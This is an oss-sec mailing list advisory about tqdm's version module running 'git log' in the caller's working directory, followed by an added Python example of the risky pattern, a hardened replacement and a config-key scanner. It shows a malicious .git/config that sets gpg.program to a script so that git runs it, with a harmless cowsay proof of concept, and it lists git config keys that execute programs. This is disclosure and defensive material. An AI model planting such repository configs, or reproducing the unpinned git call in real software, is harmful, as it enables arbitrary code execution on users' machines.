oss-sec mailing list archives
tqdm: insecure use of git
From: Jakub Wilk <jwilk () jwilk net>
Date: Sun, 25 Dec 2016 21:47:43 +0100
tqdm <https://github.com/tqdm/tqdm> is a "fast, extensible progress bar for Python".
When you import tqdm, the tqdm._version module executes the following command:

  git log -n 1 --oneline

This was meant to check if the user is running a pre-release version of tqdm. But cwd might be a part of an unrelated git repository, possibly a malicious one. At least with git 2.10 or later, it's possible to craft a repo in which "git log" executes arbitrary code:
$ tail -n4 /tmp/.git/config
[log]
showSignature = true
[gpg]
program = /tmp/moogpg
$ tail -n4 /tmp/moogpg
#!/bin/sh
exec > /dev/tty 2>&1
cowsay pwned
sleep 9999
$ cd /tmp
$ pydoc tqdm
 _______
< pwned >
 -------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
Upstream bug report:
https://github.com/tqdm/tqdm/issues/328
Affected versions: v4.4.1 and later.
--
Jakub Wilk
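The pattern the post describes, next to a hardened version, as an added example; this is not tqdm's code and not the upstream fix, and everything below (function names, the list of config keys beyond the two the post uses, the sample config text) is assumed for illustration. `risky_git_version` runs `git log` in whatever cwd the importing process has, so a `.git/config` in that tree can point `gpg.program` at any executable, exactly as in the post. `scan_git_config` parses a `.git/config` and reports keys that make git run a program, which is a cheap pre-check before touching a directory you did not create. `hardened_git_command` and `safe_git_version` only ever look at the package's own checkout: no repository discovery from cwd (GIT_DIR is pinned), signature display is forced off, and git is not invoked at all when the package is not a checkout (an installed wheel or sdist). Requires Python 3.7+; git is only needed to actually run the hardened query.

```python
"""Added example: untrusted-repo git invocation vs. a hardened version."""
import configparser
import os
import subprocess

# Config keys that make read-only git commands run a program named in the
# repository's own .git/config.  The post's PoC chains log.showSignature
# with gpg.program; the rest are further keys of the same kind.  This list
# is illustrative (an assumption of this example), not exhaustive.
EXEC_CONFIG_KEYS = {
    "gpg.program", "log.showsignature", "core.pager", "core.editor",
    "core.sshcommand", "core.hookspath", "diff.external",
}

# Constructed from the post's `tail -n4 /tmp/.git/config`, with a harmless
# [core] section added so it looks like a complete config file.
SAMPLE_CONFIG = """\
[core]
\trepositoryformatversion = 0
[log]
\tshowSignature = true
[gpg]
\tprogram = /tmp/moogpg
"""


def risky_git_version():
    """The pattern the post criticises: run git in the caller's cwd, which
    may be inside a repository the package has no business trusting."""
    out = subprocess.run(["git", "log", "-n", "1", "--oneline"],
                         capture_output=True, text=True)
    return out.stdout.strip() or None


def scan_git_config(config_text):
    """Return the keys (section.name, lower-cased, sorted) in a .git/config
    that can cause git to execute an external program."""
    # git indents options with tabs; strip them so configparser does not
    # treat any line as a continuation of the previous value.
    flat = "\n".join(line.strip() for line in config_text.splitlines())
    parser = configparser.ConfigParser(strict=False, interpolation=None)
    parser.read_string(flat)
    found = []
    for section in parser.sections():
        for name in parser[section]:
            key = "%s.%s" % (section.lower(), name.lower())
            if key in EXEC_CONFIG_KEYS:
                found.append(key)
    return sorted(found)


def hardened_git_command(repo_root):
    """argv and environment for a version query that is pinned to the
    checkout at repo_root and cannot be steered by log.showSignature."""
    root = os.path.abspath(repo_root)
    argv = ["git", "--no-pager", "-c", "log.showSignature=false",
            "log", "-n", "1", "--oneline"]
    env = dict(os.environ)
    # Pinning GIT_DIR disables repository discovery entirely, so cwd and
    # any parent directory are irrelevant.
    env["GIT_DIR"] = os.path.join(root, ".git")
    env["GIT_WORK_TREE"] = root
    env["GIT_CONFIG_NOSYSTEM"] = "1"   # ignore /etc/gitconfig as well
    return argv, env


def safe_git_version(repo_root):
    """Short log line of repo_root's own checkout, or None when repo_root
    is not a checkout (installed package), so git never runs elsewhere.
    A .git *file* (worktree/submodule pointer) also yields None here."""
    argv, env = hardened_git_command(repo_root)
    if not os.path.isdir(env["GIT_DIR"]):
        return None
    try:
        out = subprocess.run(argv, cwd=env["GIT_WORK_TREE"], env=env,
                             capture_output=True, text=True, timeout=5)
    except (OSError, subprocess.TimeoutExpired):
        return None
    return out.stdout.strip() or None


if __name__ == "__main__":
    print("suspicious keys in sample config:", scan_git_config(SAMPLE_CONFIG))
    here = os.path.dirname(os.path.abspath(__file__))
    print("version of this file's checkout:", safe_git_version(here))
```

`-c log.showSignature=false` closes only the vector shown in the post; the durable property is that git is run solely against a checkout the package ships with, never against a directory chosen by whoever launched the interpreter.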